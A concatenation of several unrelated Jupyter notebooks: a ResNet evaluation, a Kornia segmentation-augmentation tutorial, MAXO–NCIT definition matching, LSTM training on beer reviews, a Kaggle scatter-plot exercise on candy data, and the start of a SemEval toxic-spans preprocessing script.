print('Precision of ResNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_baseline_pres_scores), np.std(resnet_aug_baseline_pres_scores)))
print('Recall of ResNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_baseline_recall_scores), np.std(resnet_aug_baseline_recall_scores)))
print('f1 score of ResNet augmented baseline model: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_baseline_f1_scores), np.std(resnet_aug_baseline_f1_scores)))
###Output
Accuracy of ResNet augmented baseline model: 51.13 +/- 1.25%
Precision of ResNet augmented baseline model: 0.518 +/- 0.014
Recall of ResNet augmented baseline model: 0.561 +/- 0.343
f1 score of ResNet augmented baseline model: 0.471 +/- 0.202
###Markdown
After training the last 27 layers of the augmented model, all metrics are quite similar to those of the baseline with fine-tuning.
###Code
resnet_aug_frozen_acc_scores = []
resnet_aug_frozen_pres_scores = []
resnet_aug_frozen_recall_scores = []
resnet_aug_frozen_f1_scores = []
for i in range(3):
x=resnet_model.output
x=GlobalAveragePooling2D()(x)
preds=Dense(2,activation='softmax')(x)
resnet_model_aug_frozen=Model(inputs=resnet_model.input,outputs=preds)
for layer in resnet_model_aug_frozen.layers[:-27]:
layer.trainable = False
resnet_model_aug_frozen.compile(loss = 'categorical_crossentropy',
optimizer = Adam(learning_rate = 0.001),
metrics = ['acc'])
batchsize = 64
resnet_model_aug_frozen_history = resnet_model_aug_frozen.fit_generator(gen.flow(X_train_eff_model,
y_train_eff_model,
batch_size=batchsize),
steps_per_epoch = len(X_train_eff_model)//batchsize,
epochs = 15,
verbose = 0,
validation_data=(X_val_eff_model,
y_val_eff_model))
acc, pres, recall, f1 = get_metrics(resnet_model_aug_frozen,
X_test_eff_model,
y_test_eff)
resnet_aug_frozen_acc_scores.append(acc)
resnet_aug_frozen_pres_scores.append(pres)
resnet_aug_frozen_recall_scores.append(recall)
resnet_aug_frozen_f1_scores.append(f1)
print('Accuracy of ResNet augmented model while training last 27 layers: {:0.2f} +/- {:0.2f}%'.format(np.mean(resnet_aug_frozen_acc_scores) * 100, np.std(resnet_aug_frozen_acc_scores)*100))
print('Precision of ResNet augmented model while training last 27 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_frozen_pres_scores), np.std(resnet_aug_frozen_pres_scores)))
print('Recall of ResNet augmented model while training last 27 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_frozen_recall_scores), np.std(resnet_aug_frozen_recall_scores)))
print('f1 score of ResNet augmented model while training last 27 layers: {:0.3f} +/- {:0.3f}'.format(np.mean(resnet_aug_frozen_f1_scores), np.std(resnet_aug_frozen_f1_scores)))
###Output
Accuracy of ResNet augmented model while training last 27 layers: 63.88 +/- 0.25%
Precision of ResNet augmented model while training last 27 layers: 0.606 +/- 0.007
Recall of ResNet augmented model while training last 27 layers: 0.793 +/- 0.050
f1 score of ResNet augmented model while training last 27 layers: 0.686 +/- 0.014
|
data_augmenation_segmentation.ipynb | ###Markdown
[](https://colab.sandbox.google.com/github/kornia/tutorials/blob/master/source/data_augmenation_segmentation.ipynb) **Data Augmentation Semantic Segmentation**In this tutorial we will show how we can quickly perform **data augmentation for semantic segmentation** using the `kornia.augmentation` API. Install and get dataWe install Kornia and some dependencies, and download a simple data sample
###Code
%%capture
!pip install kornia opencv-python matplotlib
%%capture
!wget http://www.zemris.fer.hr/~ssegvic/multiclod/images/causevic16semseg3.png
# import the libraries
%matplotlib inline
import matplotlib.pyplot as plt
import cv2
import numpy as np
import torch
import torch.nn as nn
import kornia as K
###Output
_____no_output_____
###Markdown
Define Augmentation pipelineWe define a class that implements our augmentation pipeline as an `nn.Module`
###Code
from typing import Tuple

class MyAugmentation(nn.Module):
def __init__(self):
super(MyAugmentation, self).__init__()
# we define and cache our operators as class members
self.k1 = K.augmentation.ColorJitter(0.15, 0.25, 0.25, 0.25)
self.k2 = K.augmentation.RandomAffine([-45., 45.], [0., 0.15], [0.5, 1.5], [0., 0.15])
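# RandomAffine positional args above: degrees, translate, scale, shear;
# caching k2 lets forward() replay the identical sampled warp on the mask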
def forward(self, img: torch.Tensor, mask: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
# 1. apply color only in image
# 2. apply geometric transform
img_out = self.k2(self.k1(img))
# 3. infer geometry params to mask
# TODO: this will change in future so that no need to infer params
mask_out = self.k2(mask, self.k2._params)
return img_out, mask_out
###Output
_____no_output_____
###Markdown
Load the data and apply the transforms
###Code
def load_data(data_path: str) -> torch.Tensor:
data: np.ndarray = cv2.imread(data_path, cv2.IMREAD_COLOR)
data_t: torch.Tensor = K.image_to_tensor(data, keepdim=False)
data_t = K.bgr_to_rgb(data_t)
data_t = K.normalize(data_t, 0., 255.)
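# the sample is a side-by-side composite: the scene on the left, the
# segmentation labels on the right (split at column 571)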
img, labels = data_t[..., :571], data_t[..., 572:]
return img, labels
# load data (B, C, H, W)
img, labels = load_data("causevic16semseg3.png")
# create augmentation instance
aug = MyAugmentation()
# apply the augmentation pipeline to our batch of data
img_aug, labels_aug = aug(img, labels)
# visualize
img_out = torch.cat([img, labels], dim=-1)
plt.imshow(K.tensor_to_image(img_out))
plt.axis('off')
# generate several samples
num_samples: int = 10
for img_id in range(num_samples):
# generate data
img_aug, labels_aug = aug(img, labels)
img_out = torch.cat([img_aug, labels_aug], dim=-1)
# save data
plt.figure()
plt.imshow(K.tensor_to_image(img_out))
plt.axis('off')
plt.savefig(f"img_{img_id}.png", bbox_inches='tight')
###Output
Clipping input data to the valid range for imshow with RGB data ([0..1] for floats or [0..255] for integers).
|
src/scripts/.ipynb_checkpoints/maxo_ncit_defs-Copy1-checkpoint.ipynb | ###Markdown
###Markdown
ncit_id_def.info
###Code
maxo_id_def.columns = ["Maxo_ID","?cls","ID","?def"]
print(maxo_id_def.head())
maxo_id_list= []
maxo_def_list= []
maxo_def_xref_list= []
ncit_id_list=[]
ncit_def_list= []
for index, row in maxo_id_def.iterrows():
if row[2].startswith("NCIT:"):
for index, rows in ncit_id_def.iterrows():
# determine if the MAXO def xref matches the NCIT ID
if row[2] == rows[0]:
maxo_id_list.append(row[0])
maxo_def_list.append(row[3])
maxo_def_xref_list.append(row[2])
ncit_def_list.append(rows[2])
ncit_id_list.append(rows[0])
else:
continue
maxo_ncit_def_df=pd.DataFrame(list(zip(maxo_id_list, maxo_def_list, maxo_def_xref_list, ncit_id_list, ncit_def_list)), columns=["maxo_id","maxo_def", "maxo_def_xref","ncit_id", "ncit_def"])
print(maxo_ncit_def_df.head())
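# A vectorized alternative to the nested iterrows() scan above (hedged
# sketch; it assumes ncit_id_def's first and third columns hold the NCIT ID
# and its definition, exactly as the loop indexes them):
if False:
    ncit = ncit_id_def.iloc[:, [0, 2]].copy()
    ncit.columns = ["ncit_id", "ncit_def"]
    merged = (maxo_id_def[maxo_id_def["ID"].str.startswith("NCIT:")]
              .merge(ncit, left_on="ID", right_on="ncit_id"))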
with open("maxo_ncit_def.tsv",'wb') as out:
maxo_ncit_def_df.to_csv('maxo_ncit_def.tsv', encoding='utf-8', sep='\t', index=False)
###Output
maxo_id maxo_def \
0 MAXO:0000455 The use of extreme cold to damage or destroy a...
1 MAXO:0000454 Removal, separation, detachment, extirpation, ...
2 MAXO:0000838 The determination of the ratio of the prothrom...
3 MAXO:0000146 A procedure to determine the number of cells i...
4 MAXO:0000728 A technique in which sound waves are sent out ...
maxo_def_xref ncit_id \
0 NCIT:C15215 NCIT:C15215
1 NCIT:C111157 NCIT:C111157
2 NCIT:C170591 NCIT:C170591
3 NCIT:C48938 NCIT:C48938
4 NCIT:C17644 NCIT:C17644
ncit_def
0 The use of extreme cold to damage or destroy a...
1 Removal, separation, detachment, extirpation, ...
2 The determination of the ratio of the prothrom...
3 A procedure to determine the number of cells i...
4 A technique in which sound waves are sent out ...
|
notebooks/SIS on Beer Reviews - Model Training - Aspect 1 (Aroma).ipynb | ###Markdown
SIS on Beer Reviews - Model Training Aspect 1 (Aroma)
###Code
import numpy as np
from matplotlib import pyplot as plt
import seaborn as sns
import os
import sys
import gzip
sys.path.insert(0, os.path.abspath('..'))
from keras.callbacks import ModelCheckpoint
from keras.models import load_model, Model, Sequential
from keras.layers import Input, Dense, Flatten, LSTM
from keras.layers.embeddings import Embedding
from keras.optimizers import Adam
from keras.preprocessing import sequence, text
from keras import backend as K
from sklearn.model_selection import train_test_split
import os
import tensorflow as tf
os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.allow_soft_placement = True
sess = tf.Session(config=config)
K.set_session(sess)
def load_reviews(path, verbose=True):
data_x, data_y = [ ], [ ]
fopen = gzip.open if path.endswith(".gz") else open
with fopen(path, 'rb') as fin:  # open in binary mode so line.decode('ascii') works for both plain and gzipped files
for line in fin:
line = line.decode('ascii')
y, sep, x = line.partition("\t")
# x = x.split()
y = y.split()
if len(x) == 0: continue
y = np.asarray([ float(v) for v in y ])
data_x.append(x)
data_y.append(y)
if verbose:
print("{} examples loaded from {}".format(len(data_x), path))
print("max text length: {}".format(max(len(x) for x in data_x)))
return data_x, data_y
# Load beer review data for a particular aspect
ASPECT = 1 # 1, 2, or 3
BASE_PATH = '../data/beer_reviews'
path = os.path.join(BASE_PATH, 'reviews.aspect' + str(ASPECT))
train_path = path + '.train.txt.gz'
heldout_path = path + '.heldout.txt.gz'
X_train_texts, y_train = load_reviews(train_path)
X_test_texts, y_test = load_reviews(heldout_path)
# y value is just the sentiment for this aspect, throw away the other scores
y_train = np.array([y[ASPECT] for y in y_train])
y_test = np.array([y[ASPECT] for y in y_test])
# Create a 3k validation set held-out from the test set
X_test_texts, X_val_texts, y_test, y_val = train_test_split(
X_test_texts,
y_test,
test_size=3000,
random_state=42)
plt.hist(y_train)
plt.show()
print('Mean: %.3f' % np.mean(y_train))
print('Median: %.3f' % np.median(y_train))
print('Stdev: %.3f' % np.std(y_train))
print('Review length:')
train_texts_lengths = [len(x.split(' ')) for x in X_train_texts]
print("Mean %.2f words (stddev: %f)" % \
(np.mean(train_texts_lengths),
np.std(train_texts_lengths)))
# plot review lengths
plt.boxplot(train_texts_lengths)
plt.show()
# Tokenize the texts and keep only the top n words
TOP_WORDS = 10000
tokenizer = text.Tokenizer(num_words=TOP_WORDS)
tokenizer.fit_on_texts(X_train_texts)
X_train = tokenizer.texts_to_sequences(X_train_texts)
X_val = tokenizer.texts_to_sequences(X_val_texts)
X_test = tokenizer.texts_to_sequences(X_test_texts)
print(len(X_train))
print(len(X_val))
print(len(X_test))
# Bound reviews at 500 words, truncating longer reviews and zero-padding shorter reviews
MAX_WORDS = 500
X_train = sequence.pad_sequences(X_train, maxlen=MAX_WORDS)
X_val = sequence.pad_sequences(X_val, maxlen=MAX_WORDS)
X_test = sequence.pad_sequences(X_test, maxlen=MAX_WORDS)
index_to_token = {tokenizer.word_index[k]: k for k in tokenizer.word_index.keys()}
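# Sanity check (sketch): decode the first padded review back to text,
# skipping the zero ids used for padding.
if False:
    print(' '.join(index_to_token[i] for i in X_train[0] if i != 0))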
###Output
_____no_output_____
###Markdown
LSTM Model
###Code
def coeff_determination_metric(y_true, y_pred):
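    # coefficient of determination: R^2 = 1 - SS_res / SS_tot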
SS_res = K.sum(K.square( y_true-y_pred ))
SS_tot = K.sum(K.square( y_true - K.mean(y_true) ) )
return ( 1 - SS_res/(SS_tot + K.epsilon()) )
# LSTM 200
def make_lstm_model(top_words, max_words):
model = Sequential()
model.add(Embedding(top_words, 100, input_length=max_words))
model.add(LSTM(200, return_sequences=True))
model.add(LSTM(200))
model.add(Dense(1, activation='sigmoid'))
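    # sigmoid keeps predictions in [0, 1], matching the (assumed) 0-1 scaled ratings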
model.compile(loss='mse',
optimizer=Adam(),
metrics=['mse', 'mae', coeff_determination_metric])
return model
model = make_lstm_model(TOP_WORDS, MAX_WORDS)
print(model.summary())
checkpointer = ModelCheckpoint(filepath='../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.{epoch:02d}-{val_loss:.4f}.hdf5',
verbose=1,
monitor='val_loss',
save_best_only=True)
model.fit(X_train, y_train,
validation_data=(X_val, y_val),
epochs=15,
batch_size=128,
callbacks=[checkpointer],
verbose=1)
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_3 (Embedding) (None, 500, 100) 1000000
_________________________________________________________________
lstm_5 (LSTM) (None, 500, 200) 240800
_________________________________________________________________
lstm_6 (LSTM) (None, 200) 320800
_________________________________________________________________
dense_3 (Dense) (None, 1) 201
=================================================================
Total params: 1,561,801
Trainable params: 1,561,801
Non-trainable params: 0
_________________________________________________________________
None
Train on 70000 samples, validate on 3000 samples
Epoch 1/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0472 - mean_squared_error: 0.0472 - mean_absolute_error: 0.1838 - coeff_determination_metric: 0.1582
Epoch 00001: val_loss improved from inf to 0.04676, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.01-0.0468.hdf5
70000/70000 [==============================] - 914s 13ms/step - loss: 0.0472 - mean_squared_error: 0.0472 - mean_absolute_error: 0.1838 - coeff_determination_metric: 0.1582 - val_loss: 0.0468 - val_mean_squared_error: 0.0468 - val_mean_absolute_error: 0.1789 - val_coeff_determination_metric: 0.1707
Epoch 2/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0476 - mean_squared_error: 0.0476 - mean_absolute_error: 0.1873 - coeff_determination_metric: 0.1515
Epoch 00002: val_loss improved from 0.04676 to 0.03574, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.02-0.0357.hdf5
70000/70000 [==============================] - 941s 13ms/step - loss: 0.0476 - mean_squared_error: 0.0476 - mean_absolute_error: 0.1873 - coeff_determination_metric: 0.1520 - val_loss: 0.0357 - val_mean_squared_error: 0.0357 - val_mean_absolute_error: 0.1528 - val_coeff_determination_metric: 0.3671
Epoch 3/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0341 - mean_squared_error: 0.0341 - mean_absolute_error: 0.1496 - coeff_determination_metric: 0.3920
Epoch 00003: val_loss improved from 0.03574 to 0.02953, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.03-0.0295.hdf5
70000/70000 [==============================] - 932s 13ms/step - loss: 0.0340 - mean_squared_error: 0.0340 - mean_absolute_error: 0.1496 - coeff_determination_metric: 0.3922 - val_loss: 0.0295 - val_mean_squared_error: 0.0295 - val_mean_absolute_error: 0.1352 - val_coeff_determination_metric: 0.4773
Epoch 4/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0283 - mean_squared_error: 0.0283 - mean_absolute_error: 0.1336 - coeff_determination_metric: 0.4944
Epoch 00004: val_loss improved from 0.02953 to 0.02749, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.04-0.0275.hdf5
70000/70000 [==============================] - 905s 13ms/step - loss: 0.0283 - mean_squared_error: 0.0283 - mean_absolute_error: 0.1336 - coeff_determination_metric: 0.4944 - val_loss: 0.0275 - val_mean_squared_error: 0.0275 - val_mean_absolute_error: 0.1316 - val_coeff_determination_metric: 0.5129
Epoch 5/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0235 - mean_squared_error: 0.0235 - mean_absolute_error: 0.1190 - coeff_determination_metric: 0.5792
Epoch 00005: val_loss improved from 0.02749 to 0.02519, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.05-0.0252.hdf5
70000/70000 [==============================] - 916s 13ms/step - loss: 0.0235 - mean_squared_error: 0.0235 - mean_absolute_error: 0.1190 - coeff_determination_metric: 0.5791 - val_loss: 0.0252 - val_mean_squared_error: 0.0252 - val_mean_absolute_error: 0.1246 - val_coeff_determination_metric: 0.5536
Epoch 6/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0203 - mean_squared_error: 0.0203 - mean_absolute_error: 0.1093 - coeff_determination_metric: 0.6369
Epoch 00006: val_loss improved from 0.02519 to 0.02454, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.06-0.0245.hdf5
70000/70000 [==============================] - 899s 13ms/step - loss: 0.0203 - mean_squared_error: 0.0203 - mean_absolute_error: 0.1093 - coeff_determination_metric: 0.6368 - val_loss: 0.0245 - val_mean_squared_error: 0.0245 - val_mean_absolute_error: 0.1194 - val_coeff_determination_metric: 0.5648
Epoch 7/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0181 - mean_squared_error: 0.0181 - mean_absolute_error: 0.1023 - coeff_determination_metric: 0.6764
Epoch 00007: val_loss improved from 0.02454 to 0.02454, saving model to ../trained_models/asp1.regress.bs128.nodrop.lstm200.100dimembed.weights.07-0.0245.hdf5
70000/70000 [==============================] - 901s 13ms/step - loss: 0.0181 - mean_squared_error: 0.0181 - mean_absolute_error: 0.1023 - coeff_determination_metric: 0.6764 - val_loss: 0.0245 - val_mean_squared_error: 0.0245 - val_mean_absolute_error: 0.1188 - val_coeff_determination_metric: 0.5651
Epoch 8/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0164 - mean_squared_error: 0.0164 - mean_absolute_error: 0.0967 - coeff_determination_metric: 0.7070
Epoch 00008: val_loss did not improve
70000/70000 [==============================] - 943s 13ms/step - loss: 0.0164 - mean_squared_error: 0.0164 - mean_absolute_error: 0.0967 - coeff_determination_metric: 0.7070 - val_loss: 0.0247 - val_mean_squared_error: 0.0247 - val_mean_absolute_error: 0.1188 - val_coeff_determination_metric: 0.5615
Epoch 9/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0150 - mean_squared_error: 0.0150 - mean_absolute_error: 0.0918 - coeff_determination_metric: 0.7324
Epoch 00009: val_loss did not improve
70000/70000 [==============================] - 913s 13ms/step - loss: 0.0150 - mean_squared_error: 0.0150 - mean_absolute_error: 0.0918 - coeff_determination_metric: 0.7323 - val_loss: 0.0252 - val_mean_squared_error: 0.0252 - val_mean_absolute_error: 0.1180 - val_coeff_determination_metric: 0.5536
Epoch 10/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0135 - mean_squared_error: 0.0135 - mean_absolute_error: 0.0867 - coeff_determination_metric: 0.7583
Epoch 00010: val_loss did not improve
70000/70000 [==============================] - 880s 13ms/step - loss: 0.0135 - mean_squared_error: 0.0135 - mean_absolute_error: 0.0867 - coeff_determination_metric: 0.7583 - val_loss: 0.0247 - val_mean_squared_error: 0.0247 - val_mean_absolute_error: 0.1158 - val_coeff_determination_metric: 0.5615
Epoch 11/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0123 - mean_squared_error: 0.0123 - mean_absolute_error: 0.0822 - coeff_determination_metric: 0.7805
Epoch 00011: val_loss did not improve
70000/70000 [==============================] - 835s 12ms/step - loss: 0.0123 - mean_squared_error: 0.0123 - mean_absolute_error: 0.0822 - coeff_determination_metric: 0.7806 - val_loss: 0.0264 - val_mean_squared_error: 0.0264 - val_mean_absolute_error: 0.1178 - val_coeff_determination_metric: 0.5307
Epoch 12/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0110 - mean_squared_error: 0.0110 - mean_absolute_error: 0.0776 - coeff_determination_metric: 0.8027
Epoch 00012: val_loss did not improve
70000/70000 [==============================] - 836s 12ms/step - loss: 0.0110 - mean_squared_error: 0.0110 - mean_absolute_error: 0.0776 - coeff_determination_metric: 0.8027 - val_loss: 0.0261 - val_mean_squared_error: 0.0261 - val_mean_absolute_error: 0.1157 - val_coeff_determination_metric: 0.5364
Epoch 13/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0101 - mean_squared_error: 0.0101 - mean_absolute_error: 0.0739 - coeff_determination_metric: 0.8201
Epoch 00013: val_loss did not improve
70000/70000 [==============================] - 844s 12ms/step - loss: 0.0101 - mean_squared_error: 0.0101 - mean_absolute_error: 0.0739 - coeff_determination_metric: 0.8201 - val_loss: 0.0265 - val_mean_squared_error: 0.0265 - val_mean_absolute_error: 0.1161 - val_coeff_determination_metric: 0.5288
Epoch 14/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0092 - mean_squared_error: 0.0092 - mean_absolute_error: 0.0704 - coeff_determination_metric: 0.8351
Epoch 00014: val_loss did not improve
70000/70000 [==============================] - 896s 13ms/step - loss: 0.0092 - mean_squared_error: 0.0092 - mean_absolute_error: 0.0704 - coeff_determination_metric: 0.8349 - val_loss: 0.0282 - val_mean_squared_error: 0.0282 - val_mean_absolute_error: 0.1177 - val_coeff_determination_metric: 0.4998
Epoch 15/15
69888/70000 [============================>.] - ETA: 1s - loss: 0.0085 - mean_squared_error: 0.0085 - mean_absolute_error: 0.0673 - coeff_determination_metric: 0.8481
Epoch 00015: val_loss did not improve
70000/70000 [==============================] - 893s 13ms/step - loss: 0.0085 - mean_squared_error: 0.0085 - mean_absolute_error: 0.0674 - coeff_determination_metric: 0.8481 - val_loss: 0.0273 - val_mean_squared_error: 0.0273 - val_mean_absolute_error: 0.1160 - val_coeff_determination_metric: 0.5167
|
Data Visualisation/exercise-scatter-plots.ipynb | ###Markdown
**This notebook is an exercise in the [Data Visualization](https://www.kaggle.com/learn/data-visualization) course. You can reference the tutorial at [this link](https://www.kaggle.com/alexisbcook/scatter-plots).**--- In this exercise, you will use your new knowledge to propose a solution to a real-world scenario. To succeed, you will need to import data into Python, answer questions using the data, and generate **scatter plots** to understand patterns in the data. ScenarioYou work for a major candy producer, and your goal is to write a report that your company can use to guide the design of its next product. Soon after starting your research, you stumble across this [very interesting dataset](https://fivethirtyeight.com/features/the-ultimate-halloween-candy-power-ranking/) containing results from a fun survey to crowdsource favorite candies. SetupRun the next cell to import and configure the Python libraries that you need to complete the exercise.
###Code
import pandas as pd
pd.plotting.register_matplotlib_converters()
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
print("Setup Complete")
###Output
_____no_output_____
###Markdown
The questions below will give you feedback on your work. Run the following cell to set up our feedback system.
###Code
# Set up code checking
import os
if not os.path.exists("../input/candy.csv"):
os.symlink("../input/data-for-datavis/candy.csv", "../input/candy.csv")
from learntools.core import binder
binder.bind(globals())
from learntools.data_viz_to_coder.ex4 import *
print("Setup Complete")
###Output
_____no_output_____
###Markdown
## Step 1: Load the Data

Read the candy data file into `candy_data`. Use the `"id"` column to label the rows.
###Code
# Path of the file to read
candy_filepath = "../input/candy.csv"
# Fill in the line below to read the file into a variable candy_data
candy_data = pd.read_csv(candy_filepath, index_col="id")
# Run the line below with no changes to check that you've loaded the data correctly
step_1.check()
# Lines below will give you a hint or solution code
step_1.hint()
#step_1.solution()
###Output
_____no_output_____
###Markdown
## Step 2: Review the data

Use a Python command to print the first five rows of the data.
###Code
# Print the first five rows of the data
candy_data.head() # Your code here
###Output
_____no_output_____
###Markdown
The dataset contains 83 rows, where each corresponds to a different candy bar. There are 13 columns:

- `'competitorname'` contains the name of the candy bar.
- the next **9** columns (from `'chocolate'` to `'pluribus'`) describe the candy. For instance, rows with chocolate candies have `"Yes"` in the `'chocolate'` column (and candies without chocolate have `"No"` in the same column).
- `'sugarpercent'` provides some indication of the amount of sugar, where higher values signify higher sugar content.
- `'pricepercent'` shows the price per unit, relative to the other candies in the dataset.
- `'winpercent'` is calculated from the survey results; higher values indicate that the candy was more popular with survey respondents.

Use the first five rows of the data to answer the questions below.
###Code
# Fill in the line below: Which candy was more popular with survey respondents:
# '3 Musketeers' or 'Almond Joy'? (Please enclose your answer in single quotes.)
more_popular = '3 Musketeers'
# Fill in the line below: Which candy has higher sugar content: 'Air Heads'
# or 'Baby Ruth'? (Please enclose your answer in single quotes.)
more_sugar = 'Air Heads'
# Check your answers
step_2.check()
# Lines below will give you a hint or solution code
#step_2.hint()
#step_2.solution()
###Output
_____no_output_____
###Markdown
## Step 3: The role of sugar

Do people tend to prefer candies with higher sugar content?

### Part A

Create a scatter plot that shows the relationship between `'sugarpercent'` (on the horizontal x-axis) and `'winpercent'` (on the vertical y-axis). _Don't add a regression line just yet -- you'll do that in the next step!_
###Code
# Scatter plot showing the relationship between 'sugarpercent' and 'winpercent'
sns.scatterplot(x=candy_data['sugarpercent'], y=candy_data['winpercent']) # Your code here
# Check your answer
step_3.a.check()
# Lines below will give you a hint or solution code
#step_3.a.hint()
#step_3.a.solution_plot()
###Output
_____no_output_____
###Markdown
### Part B

Does the scatter plot show a **strong** correlation between the two variables? If so, are candies with more sugar relatively more or less popular with the survey respondents?
###Code
#step_3.b.hint()
# Check your answer (Run this code cell to receive credit!)
step_3.b.solution()
###Output
_____no_output_____
###Markdown
## Step 4: Take a closer look

### Part A

Create the same scatter plot you created in **Step 3**, but now with a regression line!
###Code
# Scatter plot w/ regression line showing the relationship between 'sugarpercent' and 'winpercent'
sns.regplot(x=candy_data['sugarpercent'], y=candy_data['winpercent']) # Your code here
# Check your answer
step_4.a.check()
# Lines below will give you a hint or solution code
#step_4.a.hint()
#step_4.a.solution_plot()
###Output
_____no_output_____
###Markdown
### Part B

According to the plot above, is there a **slight** correlation between `'winpercent'` and `'sugarpercent'`? What does this tell you about the candy that people tend to prefer?
###Code
#step_4.b.hint()
# Check your answer (Run this code cell to receive credit!)
step_4.b.solution()
###Output
_____no_output_____
###Markdown
## Step 5: Chocolate!

In the code cell below, create a scatter plot to show the relationship between `'pricepercent'` (on the horizontal x-axis) and `'winpercent'` (on the vertical y-axis). Use the `'chocolate'` column to color-code the points. _Don't add any regression lines just yet -- you'll do that in the next step!_
###Code
# Scatter plot showing the relationship between 'pricepercent', 'winpercent', and 'chocolate'
sns.scatterplot(x=candy_data['pricepercent'], y=candy_data['winpercent'], hue=candy_data['chocolate']) # Your code here
# Check your answer
step_5.check()
# Lines below will give you a hint or solution code
#step_5.hint()
#step_5.solution_plot()
###Output
_____no_output_____
###Markdown
Can you see any interesting patterns in the scatter plot? We'll investigate this plot further by adding regression lines in the next step!

## Step 6: Investigate chocolate

### Part A

Create the same scatter plot you created in **Step 5**, but now with two regression lines, corresponding to (1) chocolate candies and (2) candies without chocolate.
###Code
# Color-coded scatter plot w/ regression lines
sns.lmplot(x='pricepercent',y='winpercent',hue='chocolate',data=candy_data) # Your code here
# Check your answer
step_6.a.check()
# Lines below will give you a hint or solution code
step_6.a.hint()
step_6.a.solution_plot()
###Output
_____no_output_____
###Markdown
### Part B

Using the regression lines, what conclusions can you draw about the effects of chocolate and price on candy popularity?
###Code
#step_6.b.hint()
# Check your answer (Run this code cell to receive credit!)
step_6.b.solution()
###Output
_____no_output_____
###Markdown
## Step 7: Everybody loves chocolate

### Part A

Create a categorical scatter plot to highlight the relationship between `'chocolate'` and `'winpercent'`. Put `'chocolate'` on the (horizontal) x-axis, and `'winpercent'` on the (vertical) y-axis.
###Code
# Scatter plot showing the relationship between 'chocolate' and 'winpercent'
sns.swarmplot(x='chocolate',y='winpercent',data=candy_data) # Your code here
# Check your answer
step_7.a.check()
# Lines below will give you a hint or solution code
#step_7.a.hint()
#step_7.a.solution_plot()
###Output
_____no_output_____
###Markdown
### Part B

You decide to dedicate a section of your report to the fact that chocolate candies tend to be more popular than candies without chocolate. Which plot is more appropriate to tell this story: the plot from **Step 6**, or the plot from **Step 7**?
###Code
#step_7.b.hint()
# Check your answer (Run this code cell to receive credit!)
step_7.b.solution()
###Output
_____no_output_____
semeval_toxic_spans.ipynb
###Markdown
###Code
import pandas as pd
import numpy as np
import nltk
from nltk.tokenize import sent_tokenize, word_tokenize
nltk.download('punkt')
nltk.download('wordnet')
from nltk.stem import WordNetLemmatizer
wordnet_lemmatizer = WordNetLemmatizer()
!pip install sentence_transformers
from sentence_transformers import SentenceTransformer
import pickle
from gensim.models.keyedvectors import KeyedVectors
from tqdm import tqdm
!git clone https://github.com/ipavlopoulos/toxic_spans.git
from toxic_spans.evaluation.semeval2021 import f1
from google.colab import drive
drive.mount('/content/drive')
###Output
_____no_output_____
###Markdown
Extract the tokens, and label each token as toxic or not
###Code
df = pd.read_csv('/content/tsd_trial.csv')
print(df.shape)
df.head()
texts = df['text']
spans = df['spans']
for i in range(df.shape[0]):
spans[i] = str(spans[i])
if spans[i]!='[]':
spans[i] = spans[i].replace('[','').replace(']','').replace('\'','').replace('"','').replace('\\','')
spans[i] = spans[i].split(', ')
spans[i] = [int(sp) for sp in spans[i]]
else:
spans[i] = []
print(spans[0])
print(type(spans[0]))
values = []
values.append(['spans', 'text', 'tokens', 'is_toxic'])
# Walk each text character by character, splitting it into maximal runs of
# toxic / non-toxic characters (per the span offsets); tokenize each run and
# give every resulting token the run's label (1 = toxic, 0 = non-toxic)
for i, text in enumerate(texts):
if i%1000 == 0:
print(i)
binstr = []
tokens = []
tmp=''
for j in range(len(text)):
if j==0:
tmp+=text[j]
else:
if j in spans[i] and j-1 not in spans[i]:
words = word_tokenize(tmp)
for z in range(len(words)):
tokens.append(words[z])
binstr.append(0)
tmp = text[j]
elif j not in spans[i] and j-1 in spans[i]:
words = word_tokenize(tmp)
for z in range(len(words)):
tokens.append(words[z])
binstr.append(1)
tmp = text[j]
else:
tmp+=text[j]
if tmp!='':
if len(text)-1 in spans[i]:
words = word_tokenize(tmp)
for z in range(len(words)):
tokens.append(words[z])
binstr.append(1)
else:
words = word_tokenize(tmp)
for z in range(len(words)):
tokens.append(words[z])
binstr.append(0)
#print(text)
#print(spans[i])
#print(binstr)
#print(tokens)
#print('******')
values.append([spans[i], text, tokens, binstr])
pd.DataFrame(values).to_csv('tsd_trial_tokens.csv')
###Output
_____no_output_____
###Markdown
Build the training set for the tokens
###Code
df = pd.read_csv('/content/tsd_trial_tokens.csv', index_col=0, header=1)
print(df.shape)
df.head()
spans = df['spans']
texts = df['text']
tokens = df['tokens']
is_toxic = df['is_toxic']
for i in range(1, df.shape[0]):
